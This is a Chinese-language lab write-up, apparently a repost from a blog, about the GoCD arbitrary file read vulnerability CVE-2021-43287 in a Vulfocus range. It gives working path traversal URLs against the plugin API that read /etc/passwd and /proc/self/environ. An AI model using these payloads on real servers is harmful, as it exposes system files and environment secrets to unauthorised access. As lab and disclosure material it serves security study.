ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

Vulfocus靶场 | GoCD 任意文件读取漏洞 (CVE-2021-43287)

2022-08-20 23:04:21  阅读:166  来源: 互联网

标签:文件 读取 .. Vulfocus GoCD 漏洞 2021 Go ThoughtWorks


漏洞描述

GoCD 一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。
GoCD的v20.6.0 - v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取。

漏洞复现

通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd 对文件进行读取  

 

 

点击会自动下载一个文件

 

flag:

因为找个漏洞是任意文件读取

但是这个靶场中flag是在tmp目录下,也没办法查看目录下的文件

/proc/self/environ是Linux系统下的环境变量文件,用于保存系统的一些变量。

/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../proc/self/environ

 

 

 

标签:文件,读取,..,Vulfocus,GoCD,漏洞,2021,Go,ThoughtWorks
来源: https://www.cnblogs.com/mlxwl/p/16608969.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有